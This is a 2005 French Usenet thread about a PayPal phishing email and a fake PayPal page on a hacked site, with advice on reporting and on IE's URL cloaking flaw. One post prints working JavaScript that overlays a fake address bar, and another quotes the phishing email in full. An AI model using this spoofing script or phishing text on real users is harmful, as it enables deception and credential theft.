fraude paypal,comment font ils??

Txo wrote:

je les ai eu au tel, ils m'ont dit qu'ils y avaient de millions de
sites comme ca, sous entendu qu'ils ne donneront sans doute pas
suite....

Ça pose vraiment la question de la confiance qu'on peut avoir dans ce
genre de site (paypal). Je pense que quand on ne fait pas ce qu'il faut
pour que ses clients ne soient victime d'escroqueries en son nom, on ne
doit pas consacrer d'efforts et d'argent pour sécuriser ses services.

Peut on après cela utiliser les services de Paypal pour une quelconque
transaction financière ?

Autant il y a des argument contre la façon de fonctionner de paypal
autant je ne vois pas pourquoi un site, quelqu'il soit, devrait être
accusé de tout et n'importe quoi parce qu'il a du succès et est donc un
premier choix pour des tentatives de phishing.

Je vais faire un tour sur paypal...
Page d'accueil :
protect yourself from fraudulent emails...
(un gros gag sur le lient qui commence par
https://paypalssl.doubleclick.net/ pour finir par
https://www.paypal.com/cgi-bin/webscr?cmd=xpt/general/SecuritySpoof-outside
mais bon, ils affichent dès le début une vocation commerciale)

suivit de quelques conseils de bon sens sur les "faux" emails.

Il ne faut pas pousser non plus. Après si l'utilisateur utilise un
bidule qui lui cache la destination d'un lien c'est (suivant sa
connaissance) sa faute -il a cas utiliser autre chose- ou celle du
créateur du soft. Pas de paypal.

Je ne hurle pas contre l'afrique quand on me propose USD 3,000,000.00
pour aider un pauvre hère à sortir l'argent que son papa a soit disant
mis à gauche ;-)

La sécurité passe aussi par la formation de l'utilisateur.
Hélas tant qu'on aura le discours de merde "y'a rien à apprendre, c'est
instinctif OS bidule" on ne tiendra pas le bon bout.

Paypal pourrait certes porter plainte ; mais s'occuper de tout ceux qui
essayent de faire du phishing avec leur nom demanderait une main
d'oeuvre... tiens, une bonne idée pour lutter contre le chomage
finalement! ;-)

Eric.

dans (in) fr.comp.securite, trex <trex@free.fr> ecrivait (wrote) :

Bonsoir,

j'ai recu un faux email de paypal qui me dirige sur un faux site
paypal.
voici le lien : http://www.dwitalia.it/.pay/

comment font ils pour pirater une page de ce site et sont ils
intouchables??

Pour pirater un site, il suffit de s'y incruster en utilisant une faille
pour y injecter ses propres pages. Les scripts PHP écrits avec les pieds
permettent de le faire très facilement, surtout s'ils utilisent des
bidules genre phpBB qui sont des mines en la matière, et à vue de nez,
vu l'URL que tu cites, c'est probablement comme ça que la page en
question s'est incrustée à l'insu du plein gré du propriétaire du site.

ps: j'ai prevenu paypal de ce phishing

C'est bien, mais comme le dit Emmanuel Florac, le plus urgent est de
contacter l'administrateur du site piraté pour qu'il prenne les mesures
nécessaires.

Salut,

Tu peux aussi écrire à son provider. Essaie à abuse@inet.it. Il aura
sûrement plus de poids que toi auprès du webmaster et/ou de
l'administrateur du serveur. Essaie aussi de faire la même chose pour le
mail (récupération de l'adresse IP du serveur dans l'en-tête puis
plainte abuse correspondante).
Mais ce n'est pas parce qu'ils ne répondent pas qu'ils ne font rien...

Skreetch

l'emploi de l'URL cloaking permettant de dissimuler la véritable adresse de
la page web visitée.
L'URL cloaking est un autre type d'URL spoofing (voir le dossier dédié à ce
sujet), très utilisé dans le cadre d'attaques de phishing.

L'URL Cloaking est une vulnérabilité qui touche principalement Internet
Explorer. Aucune preuve de faille d'URL Cloaking exploitable n'a été mise en
évidence au sein des navigateurs alternatifs à Internet Explorer, ce qui ne
garantie rien du fait qu'il n'existera jamais de faille analogue pour ces
navigateurs.

Il est à noter que plusieurs aspects d'exploitation de cette faille sont
comblés suite à l'installation du Service Pack 2 sous Windows XP (voir
document sur ce site)

La faille d'URL Cloaking une fois exploitée permet de procéder à l'affichage
d'une page Internet tout en affichant une adresse différente dans la barre
d'adresse du navigateur ce qui a pour effet de duper l'internaute sur la
véritable adresse de la page qu'il est en train de consulter.

"trex" <trex@free.fr> a écrit dans le message de
news:rs4i511ikppe3a9dcmfk2mqbup5slog4lo@4ax.com...

j'ai recu un faux email de paypal qui me dirige sur un faux site
paypal.

ces pages font parties d'un site italien qui semblent clean

voici le lien : http://www.dwitalia.it/.pay/

comment font ils pour pirater une page de ce site et sont ils
intouchables??


ps: j'ai prevenu paypal de ce phishing

trex

Dans le post :425ad531$0$32080$626a14ce@news.free.fr,
Maurice bernardin <maurice.bernard@aol.com> nous a dit :

Il est à noter que plusieurs aspects d'exploitation de cette faille
sont comblés suite à l'installation du Service Pack 2 sous Windows XP
(voir document sur ce site)
La faille d'URL Cloaking une fois exploitée permet de procéder à
l'affichage d'une page Internet tout en affichant une adresse
différente dans la barre d'adresse du navigateur ce qui a pour effet
de duper l'internaute sur la véritable adresse de la page qu'il est
en train de consulter.

en faît avec le SP2 le lien véritable apparaît en dessous de la zone
d'adresse d'IE dans le coin haut gauche de le fenêtre;
en l'occurence hpp://www.paypal.com/cgi-bin/webscr

--
Soeur Anne
FAQ for Microsoft Antispyware :
http://www.geocities.com/marfer_mvp/FAQ_MSantispy.htm

"trex" <trex@free.fr> a écrit dans le message de
news:rs4i511ikppe3a9dcmfk2mqbup5slog4lo@4ax.com...

j'ai recu un faux email de paypal qui me dirige sur un faux site
paypal.

ces pages font parties d'un site italien qui semblent clean

voici le lien : http://www.dwitalia.it/.pay/

comment font ils pour pirater une page de ce site et sont ils
intouchables??


ps: j'ai prevenu paypal de ce phishing

trex

Bonjour,

Effectivement sous Internet explorer sa marche, mais pas avec Firefox !!!
Une raison de plus pour passer à Firefox
Astucieux, à poursuivre.
En fait il s'agit d'un simple trucage, on a caché la vraie adresse par une
autre.
Pour voir le trucage, lancer IE avec http://www.dwitalia.it/.pay/, puis
calculatrice (par exemple), et deplace calculatrice de facon a ce que
calcultrice
recouvre l'adresse, et la tu verra, comme un effet d'etiquette coller.

Si tu veux t'amuser il suffit de recopier le code qui fait sa entre les
balises HEAD , rien de bien mechant :
On creer une petit rectangle redimensionnable sur lequel on a un petit texte
!


<script language="" type="text/javascript">
var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window.screenLeft+70;
vuln_y= window.screenTop-21;
vuln_w= root.offsetWidth-200;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= 'x3Cdiv style="height: 100%; line-height: 17px; font-family:
'Tahoma', sans-serif; font-size: 8pt;">Dites NON au Referundum'

if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);
} else {
}
</script>

En fait il s'agit d'un simple trucage, on a caché la vraie adresse par une
autre.
Pour voir le trucage, lancer IE avec http://www.dwitalia.it/.pay/, puis
calculatrice (par exemple), et deplace calculatrice de facon a ce que
calcultrice
recouvre l'adresse, et la tu verra, comme un effet d'etiquette coller.

En fait la ou je me suis laissé abuser c'est dans le message qu'il
m'ont envoyé ci dessous? j'ai cru cliquer sur une adresse de paypal et
apres une fois sur le site je n'ai pas fait gaffe mais la veritable
adresse était bien visible dans la barre d'adresse.
J'ai naivement entré mon login et pass et quand j'ai vu ensuite qu'il
me demandait le numéro de carte visa j'ai compris et j'ai vite changé
de pass sur paypal


**************************************************************
Dear valued PayPal® member:



It has come to our attention that your PayPal® account information
needs to be
updated as part of our continuing commitment to protect your account
and to
reduce the instance of fraud on our website. If you could please take
5-10 minutes
out of your online experience and update your personal records you
will not run into
any future problems with the online service.
& nbsp; &n bsp;

However, failure to update your records will result in account
suspension.
Please update your records on or before April 30, 2005.

Once you have updated your account records, your PayPal® session will
not be
interrupted and will continue as normal.

To update your PayPal® records click on the following link:
http://www.paypal.com/cgi-bin/webscr?cmd=_login-run

******** CE LIEN LA POINTAIT EN FAIT LE FAUX SITE ET PAS LE SITE
PAYPAL******

Thank You.
PayPal® UPDATE TEAM ;

Accounts Management As outlined in our User Agreement, PayPal® will
periodically send you information about site changes and enhancements.

Visit our Privacy Policy and User Agreement if you have any questions.
http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside

******************************************************************************************************************

Nicolas Pouillon wrote:

ps: j'ai prevenu paypal de ce phishing

Ils feront probablement ce qu'il faut. (j'ose esperer qu'ils sont
serieux)

Je les ai prevenus a plusieurs reprises: silence radio, pas meme un ACK
:-( Je n'utiliserai pas Paypal tant que je n'ai pas de reponse de leur
part.

Salut,

Tu peux aussi écrire à son provider. Essaie à abuse@inet.it. Essaie
aussi de faire la même chose pour le mail (récupération de l'adresse IP
dans l'en-tête puis plainte abuse correspondante).
Ce n'est pas parce qu'ils ne répondent pas qu'ils ne font rien...

Skreetch

il semblerait que maintenant ce ne soit plus le cas par rapport a l'autre
jour ?


"Soeur Anne" <a@a.news.free.fr> a écrit dans le message de news:
425afe1c$0$10309$636a15ce@news.free.fr...

Dans le post :425ad531$0$32080$626a14ce@news.free.fr,
Maurice bernardin <maurice.bernard@aol.com> nous a dit :

Il est à noter que plusieurs aspects d'exploitation de cette faille
sont comblés suite à l'installation du Service Pack 2 sous Windows XP
(voir document sur ce site)
La faille d'URL Cloaking une fois exploitée permet de procéder à
l'affichage d'une page Internet tout en affichant une adresse
différente dans la barre d'adresse du navigateur ce qui a pour effet
de duper l'internaute sur la véritable adresse de la page qu'il est
en train de consulter.

en faît avec le SP2 le lien véritable apparaît en dessous de la zone
d'adresse d'IE dans le coin haut gauche de le fenêtre;
en l'occurence hpp://www.paypal.com/cgi-bin/webscr

--
Soeur Anne
FAQ for Microsoft Antispyware :
http://www.geocities.com/marfer_mvp/FAQ_MSantispy.htm

Le Sun, 10 Apr 2005 13:14:04 +0000, trex a écrit :

j'ai recu un faux email de paypal qui me dirige sur un faux site
paypal.

Tiens moi aussi aujourd'hui, faites gaffe c'est la saison...

http://www.lerchaotiker.ch/logs/cgibin/


--
Je suis riche des biens dont je sais me passer.
Louis-Jean-Baptiste Etienne Vigée.